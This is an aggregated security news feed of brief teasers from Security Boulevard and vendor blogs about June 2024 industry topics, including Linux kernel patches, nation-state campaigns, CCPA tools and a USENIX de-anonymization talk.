LogRhythm is sponsoring TNMoC to bolster engagement in computing and recently held its Customer Advisory Council and Partner Advisory Council at the museum as part of the ongoing collaboration   Bletchley Park, UK, 27 June 2024 – LogRhythm, the company helping…

The post LogRhythm Partners with The National Museum of Computing to Preserve Technological Heritage and Promote Inclusion in the Cybersecurity Industry appeared first on LogRhythm.

The post LogRhythm Partners with The National Museum of Computing to Preserve Technological Heritage and Promote Inclusion in the Cybersecurity Industry appeared first on Security Boulevard.

Waltham, Massachusetts, 27th June 2024, CyberNewsWire

The post Infinidat Revolutionizes Enterprise Cyber Storage Protection to Reduce Ransomware and Malware Threat Windows appeared first on Security Boulevard.

Researchers have identified three distinct nation-state campaigns leveraging advanced highly evasive and adaptive threat (HEAT) tactics.

The post Three Nation-State Campaigns Targeting Healthcare, Banking Discovered appeared first on Security Boulevard.

In 2024, artificial intelligence (AI) has prompted 65% of organizations to evolve their security strategies. Across the globe, this technological revolution has pushed security and business leaders to think critically about how to apply AI as a force multiplier to…

The post How to Ensure Your Data is Ready for an AI-Driven SOC  appeared first on LogRhythm.

The post How to Ensure Your Data is Ready for an AI-Driven SOC  appeared first on Security Boulevard.

In today’s data-driven world, ensuring compliance with data privacy laws like the California Consumer Privacy Act (CCPA) is crucial for businesses. Non-compliance can lead to hefty fines and reputational damage. In this blog, we’ll introduce you to the best 7 CCPA compliance tools in 2024 to make your compliance journey smoother and more efficient. What […]

The post Best 7 CCPA Compliance Tools in 2024 appeared first on Centraleyes.

The post Best 7 CCPA Compliance Tools in 2024 appeared first on Security Boulevard.

Several vulnerabilities have been identified in the Linux kernel, potentially leading to denial of service or privilege escalation. However, the good news is the patches are already available for them. Ubuntu and Debian have already released them in the new Linux kernel security update.   Recent Linux Kernel Vulnerabilities and Fixes   Below are some […]

The post Multiple Linux Kernel Vulnerabilities Lead to Denial of Service appeared first on TuxCare.

The post Multiple Linux Kernel Vulnerabilities Lead to Denial of Service appeared first on Security Boulevard.

In modern software development, applications are rarely built from scratch. Development teams extensively rely upon open source software components to accelerate development and foster innovation in software supply chains.

The post Software composition analysis (SCA): A beginner’s guide appeared first on Security Boulevard.

Cloud security has become a major focus for organizations worldwide as they battle with a growing number of data breaches and application sprawl that makes defense more complicated.

The post Cloud Security Tops Priority List for Organizations Globally appeared first on Security Boulevard.

Most organizations are uncertain about the effectiveness of their cybersecurity investments, despite increasing budgets and rampant cyber incidents, according to Optiv’s 2024 Threat and Risk Management Report.

The post Security Budgets Grow, but Inefficiencies Persist appeared first on Security Boulevard.

An amazing post

The post Strong Authentication: What It Is and Why You Need It appeared first on Security Boulevard.

Authors/Presenters:Dominic Deuber, Michael Keuchen, Nicolas Christin

Many thanks to USENIX for publishing their outstanding USENIX Security ’23 Presenter’s content, and the organizations strong commitment to Open Access.
Originating from the conference’s events situated at the Anaheim Marriott; and via the organizations YouTube channel.

Permalink

The post USENIX Security ’23 – Assessing Anonymity Techniques Employed in German Court Decisions: A De-Anonymization Experiment appeared first on Security Boulevard.